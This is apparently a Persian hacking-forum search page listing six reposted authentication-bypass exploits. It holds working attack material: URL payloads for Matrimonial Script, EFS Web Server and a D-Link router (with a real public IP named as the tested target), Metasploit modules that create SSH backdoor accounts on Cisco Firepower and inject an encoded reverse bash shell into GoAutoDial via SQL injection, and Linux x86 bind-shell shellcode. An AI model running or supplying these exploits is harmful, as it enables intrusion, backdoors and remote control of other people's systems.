رفتن به مطلب



iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'authentication'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • AnonySec
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پروژه های شرکت
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

6 نتیجه پیدا شد

  1. Hacking

    # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # <!-- # Exploit Title: Matrimonial Script 2.7 - Admin panel Authentication bypass # Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer # Dork: N/A # Date: 27.08.2017 # Vendor Homepage: http://www.scubez.net/ # Software Link: http://www.mscript.in/ # Version: 2.7 # Category: Webapps # Tested on: windows 7 / mozila firefox # supporting tools for testing : No-Redirect Add-on in firefox # --!> # ======================================================== # # # admin panel Authentication bypass # # Description : An Attackers are able to completely compromise the web application built upon # Matrimonial Script as they can gain access to the admin panel and manage the website as an admin without # prior authentication! # # Proof of Concept : - # Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php # Step 2: Access http://example.com/path/admin/index.php # # # Risk : Unauthenticated attackers are able to gain full access to the administrator panel # and thus have total control over the web application, including content change,add admin user .. etc # # # # # ======================================================== # [+] Disclaimer # # Permission is hereby granted for the redistribution of this advisory, # provided that it is not altered except by reformatting it, and that due # credit is given. Permission is explicitly given for insertion in # vulnerability databases and similar, provided that due credit is given to # the author. The author is not responsible for any misuse of the information contained # herein and prohibits any malicious use of all security related information # or exploits by the author or elsewhere. # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
  2. Hacking

    # Exploit Title: D-Link DIR-600 - Authentication Bypass (Absolute Path Traversal Attack) # CVE - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12943 # Date: 29-08-2017 # Exploit Author: Jithin D Kurup # Contact : https://in.linkedin.com/in/jithin-d-kurup-77b616142 # Vendor : www.dlink.com # Version: Hardware version: B1 Firmware version: 2.01 # Tested on:All Platforms 1) Description After Successfully Connected to D-Link DIR-600 Router(FirmWare Version : 2.01), Any User Can Easily Bypass The Router's Admin Panel Just by adding a simple payload into URL. D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack, as demonstrated by discovering the admin password. Its More Dangerous when your Router has a public IP with remote login enabled. IN MY CASE, Tested Router IP : http://190.164.170.249 Video POC : https://www.youtube.com/watch?v=PeNOJORAQsQ 2) Proof of Concept Step 1: Go to Router Login Page : http://190.164.170.249:8080 Step 2: Add the payload to URL. Payload: model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd Bingooo You got admin Access on router. Now you can download/upload settiing, Change setting etc. ---------------Greetz---------------- +++++++++++ www.0seccon.com ++++++++++++ Saran,Dhani,Gem,Vignesh,Hemanth,Sudin,Vijith
  3. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::Remote::SSH def initialize(info={}) super(update_info(info, 'Name' => "Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability", 'Description' => %q{ This module exploits a vulnerability found in Cisco Firepower Management Console. The management system contains a configuration flaw that allows the www user to execute the useradd binary, which can be abused to create backdoor accounts. Authentication is required to exploit this vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matt', # Original discovery & PoC 'sinn3r' # Metasploit module ], 'References' => [ [ 'CVE', '2016-6433' ], [ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ] ], 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Targets' => [ [ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ] ], 'Privileged' => false, 'DisclosureDate' => 'Oct 10 2016', 'CmdStagerFlavor'=> %w{ echo }, 'DefaultOptions' => { 'SSL' => 'true', 'SSLVersion' => 'Auto', 'RPORT' => 443 }, 'DefaultTarget' => 0)) register_options( [ # admin:Admin123 is the default credential for 6.0.1 OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']), OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']), OptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: Random)']), OptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']), OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']), OptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\'s SSH port', 22]) ], self.class) end def check # For this exploit to work, we need to check two services: # * HTTP - To create the backdoor account for SSH # * SSH - To execute our payload vprint_status('Checking Cisco Firepower Management console...') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213') }) if res && res.code == 200 vprint_status("Console is found.") vprint_status("Checking SSH service.") begin ::Timeout.timeout(datastore['SSH_TIMEOUT']) do Net::SSH.start(rhost, 'admin', port: datastore['SSHPORT'], password: Rex::Text.rand_text_alpha(5), auth_methods: ['password'], non_interactive: true ) end rescue Timeout::Error vprint_error('The SSH connection timed out.') return Exploit::CheckCode::Unknown rescue Net::SSH::AuthenticationFailed # Hey, it talked. So that means SSH is running. return Exploit::CheckCode::Appears rescue Net::SSH::Exception => e vprint_error(e.message) end end Exploit::CheckCode::Safe end def get_sf_action_id(sid) requirements = {} print_status('Attempting to obtain sf_action_id from rulesimport.cgi') uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi') res = send_request_cgi({ 'method' => 'GET', 'uri' => uri, 'cookie' => "CGISESSID=#{sid}" }) unless res fail_with(Failure::Unknown, 'Failed to obtain rules import requirements.') end sf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1] unless sf_action_id fail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi') end sf_action_id end def create_ssh_backdoor(sid, user, pass) uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi') sf_action_id = get_sf_action_id(sid) sh_name = 'exploit.sh' print_status("Attempting to create an SSH backdoor as #{user}:#{pass}") mime_data = Rex::MIME::Message.new mime_data.add_part('Import', nil, nil, 'form-data; name="action_submit"') mime_data.add_part('file', nil, nil, 'form-data; name="source"') mime_data.add_part('1', nil, nil, 'form-data; name="manual_update"') mime_data.add_part(sf_action_id, nil, nil, 'form-data; name="sf_action_id"') mime_data.add_part( "sudo useradd -g ldapgroup -p `openssl passwd -1 #{pass}` #{user}; rm /var/sf/SRU/#{sh_name}", 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{sh_name}\"" ) send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'cookie' => "CGISESSID=#{sid}", 'ctype' => "multipart/form-data; boundary=#{mime_data.bound}", 'data' => mime_data.to_s, 'vars_get' => { 'no_mojo' => '1' }, }) end def generate_new_username datastore['NEWSSHUSER'] || Rex::Text.rand_text_alpha(5) end def generate_new_password datastore['NEWSSHPASS'] || Rex::Text.rand_text_alpha(5) end def report_cred(opts) service_data = { address: rhost, port: rport, service_name: 'cisco', protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { origin_type: :service, module_fullname: fullname, username: opts[:user], private_data: opts[:password], private_type: :password }.merge(service_data) login_data = { last_attempted_at: DateTime.now, core: create_credential(credential_data), status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: opts[:proof] }.merge(service_data) create_credential_login(login_data) end def do_login console_user = datastore['USERNAME'] console_pass = datastore['PASSWORD'] uri = normalize_uri(target_uri.path, 'login.cgi') print_status("Attempting to login in as #{console_user}:#{console_pass}") res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'username' => console_user, 'password' => console_pass, 'target' => '' } }) unless res fail_with(Failure::Unknown, 'Connection timed out while trying to log in.') end res_cookie = res.get_cookies if res.code == 302 && res_cookie.include?('CGISESSID') cgi_sid = res_cookie.scan(/CGISESSID=(\w+);/).flatten.first print_status("CGI Session ID: #{cgi_sid}") print_good("Authenticated as #{console_user}:#{console_pass}") report_cred(username: console_user, password: console_pass) return cgi_sid end nil end def execute_command(cmd, opts = {}) @first_exec = true cmd.gsub!(/\/tmp/, '/usr/tmp') # Weird hack for the cmd stager. # Because it keeps using > to write the payload. if @first_exec @first_exec = false else cmd.gsub!(/>>/, ' > ') end begin Timeout.timeout(3) do @ssh_socket.exec!("#{cmd}\n") vprint_status("Executing #{cmd}") end rescue Timeout::Error fail_with(Failure::Unknown, 'SSH command timed out') rescue Net::SSH::ChannelOpenFailed print_status('Trying again due to Net::SSH::ChannelOpenFailed (sometimes this happens)') retry end end def init_ssh_session(user, pass) print_status("Attempting to log into SSH as #{user}:#{pass}") factory = ssh_socket_factory opts = { auth_methods: ['password', 'keyboard-interactive'], port: datastore['SSHPORT'], use_agent: false, config: false, password: pass, proxy: factory, non_interactive: true } opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do @ssh_socket = Net::SSH.start(rhost, user, opts) end rescue Net::SSH::Exception => e fail_with(Failure::Unknown, e.message) end end def exploit # To exploit the useradd vuln, we need to login first. sid = do_login return unless sid # After login, we can call the useradd utility to create a backdoor user new_user = generate_new_username new_pass = generate_new_password create_ssh_backdoor(sid, new_user, new_pass) # Log into the SSH backdoor account init_ssh_session(new_user, new_pass) begin execute_cmdstager({:linemax => 500}) ensure @ssh_socket.close end end end
  4. Hacking

    # Exploit Title: EFS Web Server 7.2 Authentication Bypass # Date: 11-06-2017 # Software Link: http://www.sharing-file.com/efssetup.exe # Software Version : 7.2 # Exploit Author: Touhid M.Shaikh # Contact: http://twitter.com/touhidshaikh22 # Website: http://touhidshaikh.com/ ######## Description ######## <!-- What is Easy File Sharing Web Server 7.2 ? Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser. It can help you share files with your friends and colleagues. They can download files from your computer or upload files from theirs.They will not be required to install this software or any other software because an internet browser is enough. Easy File Sharing Web Server also provides a Bulletin Board System (Forum). It allows remote users to post messages and files to the forum. The Secure Edition adds support for SSL encryption that helps protect businesses against site spoofing and data corruption. --> ######## Video PoC and Article ######## https://www.youtube.com/watch?v=XlTH7Fm1m1w http://touhidshaikh.com/blog/poc/EFSwebservr-authbypass/ ######## Attact Description ######## <!-- Note: No Need to Login...bcz this is auth bypass vulnerability .hehehe. ==>START<== Any visitor.. We can Bypass the Login Screen by just Change the URL and Browse the Drives. bingoo... --> ######## Proof of Concept ######## When we visit the EFS web server its prompt for login, now attacker just change url to below. Exploit.... http://192.168.1.14/disk_c/ in this case change drvie by just change /disk_c to /disk_<Drive latter> example. /disk_d , /disk_f etc ============================================= NOTE :: :: Now We have Permission to View Drives and Folder and Download Files. in Diffrent Drives or folder. ============================================
  5. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "GoAutoDial 3.3 Authentication Bypass / Command Injection", 'Description' => %q{ This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges. The default pre-packaged ISO builds are available from goautodial.org. Currently, the hardcoded command injection payload is an encoded reverse-tcp bash one-liner and the handler should be setup to receive it appropriately. }, 'License' => MSF_LICENSE, 'Author' => [ 'Chris McCurley', # Discovery & Metasploit module ], 'References' => [ ['CVE', '2015-2843'], ['CVE', '2015-2845'] ], 'Platform' => %w{unix}, 'Arch' => ARCH_CMD, 'Targets' => [ ['Automatic', {} ] ], 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }, 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => 'Apr 21 2015')) register_options( [ OptPort.new('RPORT', [true, 'The target port', 443]), OptBool.new('SSL', [false, 'Use SSL', true]), OptString.new('TARGETURI', [true, 'The base path', '/']) ]) end def check res = check_version() if res and res.body =~ /1421902800/ return Exploit::CheckCode::Safe else return Exploit::CheckCode::Vulnerable end end def check_version() uri = target_uri.path send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'changelog.txt'), 'headers' => { 'User-Agent' => 'Mozilla/5.0', 'Accept-Encoding' => 'identity' } }) end def sqli_auth_bypass() uri = target_uri.path send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'index.php', 'go_login', 'validate_credentials'), 'headers' => { 'User-Agent' => 'Mozilla/5.0', 'Accept-Encoding' => 'identity' }, 'vars_post' => { 'user_name' => 'admin', 'user_pass' => '\'%20or%20\'1\'%3D\'1' } }) end def sqli_admin_pass(cookies) uri = target_uri.path send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'index.php', 'go_site', 'go_get_user_info', '\'%20OR%20active=\'Y'), 'headers' => { 'User-Agent' => 'Mozilla/5.0', 'Accept-Encoding' => 'identity', 'Cookie' => cookies } }) end # # Run the actual exploit # def execute_command() encoded = Rex::Text.encode_base64("#{payload.encoded}") params = "||%20bash%20-c%20\"eval%20`echo%20-n%20" + encoded + "%20|%20base64%20--decode`\"" uri = target_uri.path send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'index.php', 'go_site', 'cpanel', params), 'headers' => { 'User-Agent' => 'Mozilla/5.0', 'Accept-Encoding' => 'identity', 'Cookie' => @cookie } }) end def exploit() print_status("#{rhost}:#{rport} - Trying SQL injection...") res1 = sqli_auth_bypass() if res1 && res1.code == 200 print_good('Authentication Bypass (SQLi) was successful') else print_error('Error: Run \'check\' command to identify whether the auth bypass has been fixed') end @cookie = res1.get_cookies print_status("#{rhost}:#{rport} - Dumping admin password...") res = sqli_admin_pass(@cookie) if res print_good(res.body) else print_error('Error: No creds returned, possible mitigations are in place.') end print_status("#{rhost}:#{rport} - Sending payload...waiting for connection") execute_command() end end
  6. /* * linux-x86-authportbind.c - AUTH portbind shellcode 166 bytes for Linux/x86 * Copyright (c) 2006 Gotfault Security <[email protected]> * * portbind shellcode that bind()'s a shell on port 64713/tcp * and requests a user password. * */ char shellcode[] = /* socket(AF_INET, SOCK_STREAM, 0) */ "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x99" // cltd "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" // push $0x2 "\x89\xe1" // mov %esp,%ecx "\xcd\x80" // int $0x80 /* bind(s, server, sizeof(server)) */ "\x52" // push %edx "\x66\x68\xfc\xc9" // pushw $0xc9fc // PORT = 64713 "\x66\x6a\x02" // pushw $0x2 "\x89\xe1" // mov $esp,%ecx "\x6a\x10" // push $0x10 "\x51" // push %ecx "\x50" // push %eax "\x89\xe1" // mov %esp,%ecx "\x89\xc6" // mov %eax,%esi "\x43" // inc %ebx "\xb0\x66" // mov $0x66,%al "\xcd\x80" // int $0x80 /* listen(s, anything) */ "\xb0\x66" // mov $0x66,%al "\xd1\xe3" // shl %ebx "\xcd\x80" // int $0x80 /* accept(s, 0, 0) */ "\x52" // push %edx "\x52" // push %edx "\x56" // push %esi "\x89\xe1" // mov %esp,%ecx "\x43" // inc %ebx "\xb0\x66" // mov $0x66,%al "\xcd\x80" // int $0x80 "\x96" // xchg %eax,%esi /* send(s, "Password: ", 0x0a, flags) */ "\x52" // push %edx "\x68\x72\x64\x3a\x20" // push $0x203a6472 "\x68\x73\x73\x77\x6f" // push $0x6f777373 "\x66\x68\x50\x61" // pushw $0x6150 "\x89\xe7" // mov $esp,%edi "\x6a\x0a" // push $0xa "\x57" // push %edi "\x56" // push %esi "\x89\xe1" // mov %esp,%ecx "\xb3\x09" // mov $0x9,%bl "\xb0\x66" // mov $0x66,%al "\xcd\x80" // int $0x80 /* recv(s, *buf, 0x08, flags) */ "\x52" // push %edx "\x6a\x08" // push $0x8 "\x8d\x4c\x24\x08" // lea 0x8(%esp),%ecx "\x51" // push %ecx "\x56" // push %esi "\x89\xe1" // mov %esp,%ecx "\xb3\x0a" // mov $0xa,%bl "\xb0\x66" // mov $0x66,%al "\xcd\x80" // int $0x80 "\x87\xf3" // xchg %esi,%ebx /* like: strncmp(string1, string2, 0x8) */ "\x52" // push %edx "\x68\x61\x75\x6c\x74" // push $0x746c7561 // password "\x68\x67\x6f\x74\x66" // push $0x66746f67 // here "\x89\xe7" // mov %esp,%edi "\x8d\x74\x24\x1c" // lea 0x1c(%esp),%esi "\x89\xd1" // mov %edx,%ecx "\x80\xc1\x08" // add $0x8,%cl "\xfc" // cld "\xf3\xa6" // repz cmpsb %es:(%edi),%ds:(%esi) "\x74\x04" // je dup /* exit(something) */ "\xf7\xf0" // div %eax "\xcd\x80" // int $0x80 /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */ "\x6a\x02" // push $0x2 "\x59" // pop %ecx "\xb0\x3f" // mov $0x3f,%al "\xcd\x80" // int $0x80 "\x49" // dec %ecx "\x79\xf9" // jns dup_loop /* execve("/bin/sh", ["/bin/sh"], NULL) */ "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x52" // push %edx "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp, %ebx "\x52" // push %edx "\x53" // push %ebx "\x89\xe1" // mov %esp, %ecx "\xcd\x80"; // int $0x80 int main() { int (*f)() = (int(*)())shellcode; printf("Length: %u\n", strlen(shellcode)); f(); }
×